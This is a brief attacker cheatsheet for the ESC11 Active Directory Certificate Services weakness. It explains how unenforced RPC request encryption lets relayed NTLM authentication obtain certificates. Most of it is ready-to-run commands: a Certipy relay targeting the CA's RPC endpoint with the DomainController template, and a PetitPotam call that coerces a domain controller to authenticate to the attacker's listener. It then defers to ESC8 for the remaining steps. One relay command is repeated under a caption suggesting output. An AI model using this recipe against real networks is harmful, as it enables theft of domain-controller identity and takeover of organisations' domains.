ESC11

A cheatsheet for exploiting the ESC11 vulnerability by targeting the IF_ENFORCEENCRYPTICERTREQUEST flag in ADCS to abuse NTLM relay attacks for certificate requests.

Author: BobBuilder

The vulnerability identified as ESC11 involves exploiting the modification of the IF_ENFORCEENCRYPTICERTREQUEST flag in the MS-ICPR RPC interface of ADCS, potentially allowing an NTLM relay attack to request certificates from authorized certificate templates via AD CS ICPR endpoints, utilizing tools like ntlmrelayx.py or Certipy to relay coerced SMB NTLM authentication over RPC/ICRP, which, if successful, enables certificate enrollment over unencrypted sessions.

Linux

Setup the relay

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Coerce authentication with PetitPotam

bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>

Certipy receiving Authentication from the AD DC

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Now we follow the steps from ESC8